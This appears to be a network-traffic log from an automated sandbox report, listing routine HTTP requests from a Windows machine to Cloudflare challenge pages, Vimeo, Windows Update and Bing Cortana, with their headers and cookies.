Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94bb7f676d193594/1749250531029/Tx3Hc3TPAQTyq5D HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /c.gif?ctsa=mr&CtsSyncId=7E03B6E45C464D998B125395443D9131&MUID=25FDF19892606E953408E79B93376F8D HTTP/1.1host: c.clarity.msuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: SM=Ccookie: MUID=25FDF19892606E953408E79B93376F8Dcookie: MR=0cookie: ANONCHK=0priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94bb7f6409043594/1749250531746/Aj3zL7EnpO7OYL8 HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/09yg8/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94bb7f6409043594/1749250531746/Aj3zL7EnpO7OYL8 HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=cFRVyAoUYR539b5&MD=DvvTFl6k HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94bb7f6b5a0e3594/1749250532944/260d414345336fdab62b4e109b9be6a6c7b2b4b91fc2c4bd8e00c8397b355fad/-ULKRO2vr-xbgb9 HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/lepop/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94bb7f6409043594/1749250531748/8911b34db7fa3d3b541dcdb8a9b3aa0b58ff49b8a078aa86fade885af2e3cd7d/urrgO5dL2WD9_cD HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/09yg8/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94bb7f6b5a0e3594/1749250532946/cVj9_1Y-IK1OLyL HTTP/1.1host: challenges.cloudflare.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/lepop/0x4AAAAAAAQTptj2So4dx43e/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/d/94bb7f6b5a0e3594/1749250532946/cVj9_1Y-IK1OLyL HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/94bb7f676d193594/1749250531037/209067408d9e797407deedf815b431b5cd70da1c44d3343a6b3356d63515d965/Rb7NeUmtNHeLYdL HTTP/1.1host: challenges.cloudflare.comcache-control: max-age=0sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/hk1y9/0x4AAAAAAAbaszMygKLnGbeo/auto/fbE/new/normal/auto/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/578173051:1749248989:ofWsHxH2SCaqDwfYHjmWDSvWa5y_r8jGMjs_Jcmo-Ac/94bb7f676d193594/YMK7TNejmOfEtlX4Jaipa3LIa4VdQmeVzzmn5zJIJmk-1749250530-1.2.1.1-VlKBfFfT5WmzHyBGdJnzZCmt19OkBZQ5OA_dEq_hOU7RPvii9SGhWd8zbCt6y7Oh HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /video/961277965?autoplay=0&muted=1&loop=1&background=0&turnstile=0.U6IefV3jQhiaYCb1FfxaVb2_SLx87cQIkAytShgaGKUIm3Ts77usctSATdWkGLAVIMx4KT-mT3UowtDG5EXco7Qb4AEyFX6BLRGhf95DpIos3Iacz-5Q0XCdkWOuJBmlwVtZHxKKZSHOwKWmiEerTHQgNOX3MeuWif0C_BSvRNRkmpNtg5W5yKs0qOi6aWNPgKRMQs3-1izXG07xM37NKP734G2kH0Qz9VtvZj40MQKzdSzkJN7lM2fRY_6xRa9PXutkqmyZfkrscQHLKE5JEfX-ZR2m3kNyNmfCyP2SwqB0dwH7fk0sx3oXVyMrYa41XW7GvbQqHd8r8y3tzWReRUuqregQZDGB2o1HgAXULf8jz_MvIMn_Waudwh6h7syifl-YGnrCSyrAK1alIPX3oEUSxRGr1KCll9MFLJ6mVePw3deYB5HkXP0rWcDx2sTkwVGz9fRLAidkIVkdbHs7pUkR_FM-NnZarqWZFocCS50rzMUfP16za2lTAHiGRby2wUWQg0zKSTpTSlFv-Okz-Sk20Xqt9Tty_Mq6drmu7BvA-5vKeGyfjeRVaRFrGi-KPNWFso4uMxzMCqgX1PPfPudsL_W8xSY551ME4JRBrxydDS7lE2tHNW0H8pU2fPJcnV44qNU80txtQPEDJ-2qt8epIdxsavi8BGtd5hlMJGH51ovaJ3bY1XOfXE4kyLo8_9qveeXaCxYP-39vDu72bNMH0o3z1LnXPtPg3tFmDJAqLH4tN_qUb2oinOpFshdVJ52isfrW5iSV7wSD7lx8Cd7ySzPLAXg1NDddhByFgIqsoRXo6-pYG5a2eyZfvpQFM8sHKYku8mOzyMjGgluzkwjvcTWc9B_5kwaX2nyjZcs.ZZT9nPBc0e-w9sJJjeUEqw.8f477d745ef5a7d230f58a7b7e904559f40e7c5d99e441648f728a4bbf667200&ref=https%253A%252F%252Fwww.elevate.inc%252F HTTP/1.1Host: player.vimeo.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1997378774:1749248979:04BudNpFxJAJsVptb57CinVOfR6ZD9ct5KPQ32_d-vc/94bb7f6b5a0e3594/lqKpGLpwgiuR79B9ezenbcotLFsnzO6XPZ8ZEj7pQJA-1749250531-1.2.1.1-ekq2wY6AobRExZ7VlAYsMQTsxkvHwgHrZDzxUllcX.1WojuIMEM8i5mRJKS54d9b HTTP/1.1host: challenges.cloudflare.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /video/1873938888-35d848930fae6431d52dc43529eec4d4f2997d7df05901b62650f7145f37e402-d?mw=80&q=85 HTTP/1.1host: i.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /p/4.40.69/css/player.css HTTP/1.1host: f.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /p/4.40.69/js/vendor.module.js HTTP/1.1host: f.vimeocdn.comorigin: https://player.vimeo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /p/4.40.69/js/player.module.js HTTP/1.1host: f.vimeocdn.comorigin: https://player.vimeo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
Source: global traffic	HTTP traffic detected: GET /js_opt/modules/utils/vuid.min.js HTTP/1.1host: f.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /video/1873938888-35d848930fae6431d52dc43529eec4d4f2997d7df05901b62650f7145f37e402-d?mw=80&q=85 HTTP/1.1host: i.vimeocdn.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /video/1873938888-35d848930fae6431d52dc43529eec4d4f2997d7df05901b62650f7145f37e402-d?mw=800&mh=450 HTTP/1.1host: i.vimeocdn.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://player.vimeo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /video/1873938888-35d848930fae6431d52dc43529eec4d4f2997d7df05901b62650f7145f37e402-d?mw=800&mh=450 HTTP/1.1host: i.vimeocdn.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=2f3777f7&IPMID=1741339061431&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=r&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=eab34d441622486489e12b453af05ccc&ig=c7da18210cf34bfeb0f5898fe9412456 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=run&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=eab34d441622486489e12b453af05ccc&ig=0b66c09caa924ed98b268f9ad1c1275c HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweooBkQGUAYcBgAGEAb8BwgEwtwHFAQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C60L1QTiBf8L5grQCsMIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/3C/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Wed, 11 Aug 2010 06:19:28 GMTcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/hNxzr-RHKbwBAMICMusrEHvzZ7Q.css?bu=M-0K5grzCuYK1wvmCt0L5grmCuYK6AvmCu8L5gr1C-YK-wvmCoEM5gqFC-YKiwvmCv8K5grmCs4L5gqaC-YKoAvmCpQL5grmCrALswvmCuYKywu5C-YKvwvCC-YKrQzmCocM5groDA&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=23077e13&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
